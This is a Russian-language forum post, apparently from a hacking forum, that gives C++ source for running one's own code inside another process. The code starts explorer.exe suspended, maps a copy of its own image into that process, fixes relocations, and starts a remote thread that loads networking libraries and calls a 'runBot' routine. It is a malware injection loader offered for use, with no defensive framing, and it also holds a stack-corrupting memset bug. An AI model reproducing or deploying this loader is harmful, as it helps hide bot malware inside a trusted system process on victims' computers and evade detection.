Пользователь
- Статус
- Оффлайн
- Регистрация
- 1 Ноя 2019
- Сообщения
- 94
- Реакции
- 34
Запускаем часть своего кода С++ в другом процессе
C++:
DWORD WINAPI injectedCode() {
const char* libList[] = { "shlwapi.dll", "mpr.dll", "netapi32.dll", "Gdiplus.dll", "wininet.dll", "kernel32.dll", "ws2_32.dll", "Gdi32.dll", "Ole32.dll", "Iphlpapi.dll" };
for(int i = 0; i < _countof(libList); i++){
LoadLibraryA((char*)libList[i]);
}
runBot();
return 0;
}
void ProcessRelocs(PIMAGE_BASE_RELOCATION reloc, SIZE_T imageBase, SIZE_T delta, DWORD relocSize)
{
if (relocSize <= 0) return;
while (reloc->SizeOfBlock > 0)
{
SIZE_T va = imageBase + reloc->VirtualAddress;
unsigned short* relInfo = (unsigned short*)((byte*)reloc + IMAGE_SIZEOF_BASE_RELOCATION);
for (DWORD i = 0; i < (reloc->SizeOfBlock - IMAGE_SIZEOF_BASE_RELOCATION) / 2; i++, relInfo++)
{
int type = *relInfo >> 12;
int offset = *relInfo & 0xfff;
switch (type)
{
case IMAGE_REL_BASED_ABSOLUTE:
break;
case IMAGE_REL_BASED_HIGHLOW:
case IMAGE_REL_BASED_DIR64:
*((SIZE_T*)(va + offset)) += delta;
break;
}
}
reloc = (PIMAGE_BASE_RELOCATION)(((SIZE_T)reloc) + reloc->SizeOfBlock);
}
}
HMODULE GetImageBase(void* funcAddr)
{
SIZE_T addr = (funcAddr) ? (SIZE_T)funcAddr : (SIZE_T)&GetImageBase;
addr &= ~0xffff;
for (;;)
{
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)addr;
if (dosHeader->e_magic == IMAGE_DOS_SIGNATURE)
{
if (dosHeader->e_lfanew < 0x1000)
{
PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((byte*)addr)[dosHeader->e_lfanew];
if (header->Signature == IMAGE_NT_SIGNATURE)
break;
}
}
addr -= 0x10000;
}
return (HMODULE)addr;
}
inline PIMAGE_OPTIONAL_HEADER GetOptionalHeader(HMODULE imageBase)
{
return (PIMAGE_OPTIONAL_HEADER)((LPVOID)((SIZE_T)imageBase + ((PIMAGE_DOS_HEADER)(imageBase))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)));
}
SIZE_T InjectCode(HANDLE hprocess, typeFuncThread startFunc, HMODULE* newBaseImage)
{
HMODULE imageBase = GetImageBase(startFunc);
DWORD sizeOfImage = GetOptionalHeader(imageBase)->SizeOfImage;
HANDLE hmap = CreateFileMappingA((HANDLE)-1, nullptr, PAGE_EXECUTE_READWRITE, 0, sizeOfImage, nullptr);
void* view = MapViewOfFile(hmap, FILE_MAP_WRITE, 0, 0, 0);
if (!view) return false;
memcpy(view, (void*)imageBase, sizeOfImage);
SIZE_T viewSize = 0;
SIZE_T newBaseAddr = 0;
SIZE_T addr = 0;
NTSTATUS status = ZwMapViewOfSection(hmap, hprocess, (PVOID*)&newBaseAddr, 0, sizeOfImage, nullptr, &viewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE);
if (status == 0)
{
PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)imageBase;
PIMAGE_NT_HEADERS pe = (PIMAGE_NT_HEADERS)((byte*)pdh + pdh->e_lfanew);
ULONG relRVA = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
ULONG relSize = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
ProcessRelocs((PIMAGE_BASE_RELOCATION)((SIZE_T)imageBase + relRVA), (SIZE_T)view, newBaseAddr - (SIZE_T)imageBase, relSize);
addr = (SIZE_T)startFunc - (SIZE_T)imageBase + newBaseAddr;
}
if (newBaseImage) *newBaseImage = (HMODULE)newBaseAddr;
UnmapViewOfFile(view);
CloseHandle(hmap);
return addr;
}
BOOL RunInjectCode(HANDLE hProc, HANDLE hthread, typeFuncThread startFunc, typeInjectCode func)
{
unsigned int addr = func(hProc, startFunc, 0);
if (addr == 0) return false;
DWORD id;
HANDLE hThread2 = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)addr, 0, 0, &id);
if (hThread2)
{
return 1;
}
else
{
HANDLE hthread;
CLIENT_ID cid;
if (RtlCreateUserThread(hProc, nullptr, FALSE, 0, 0, 0, (void*)addr, 0, &hthread, &cid) == 0)
{
CloseHandle(hthread);
return 1;
}
}
return 0;
}
DWORD ExecVA(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, va_list va)
{
DWORD ret = 0;
if (exitCode) *exitCode = 0;
if (hprocess) *hprocess = 0;
if (hthread) *hthread = 0;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFOA));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(si);
BOOL res = FALSE;
if (!res)
{
res = CreateProcessA(0, (CHAR*)cmd, 0, 0, FALSE, options, 0, 0, &si, &pi);
}
if (res)
{
if (wait > 0)
{
if (WaitForSingleObject(pi.hProcess, wait) == WAIT_OBJECT_0)
{
if (exitCode)
{
GetExitCodeProcess(pi.hProcess, exitCode);
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
pi.hThread = 0;
pi.hProcess = 0;
ret = pi.dwProcessId;
}
}
else
ret = pi.dwProcessId;
if (hthread)
*hthread = pi.hThread;
else
CloseHandle(pi.hThread);
if (hprocess)
*hprocess = pi.hProcess;
else
CloseHandle(pi.hProcess);
}
return ret;
}
DWORD Exec(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, ...)
{
va_list va;
va_start(va, cmd);
return ExecVA(options, hprocess, hthread, exitCode, wait, cmd, va);
}
BOOL RunExplorer(HANDLE* hprocess, HANDLE* hthread)
{
return Exec(CREATE_SUSPENDED, hprocess, hthread, 0, 0, "explorer.exe") != 0;
}
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
HANDLE hprocess, hthread;
memset((void*)&hprocess, 0, 2048);
memset((void*)&hthread, 0, 2048);
if (RunExplorer(&hprocess, &hthread))
{
RunInjectCode(hprocess, hthread, (typeFuncThread)injectedCode, InjectCode);
}
ExitProcess(0);
}
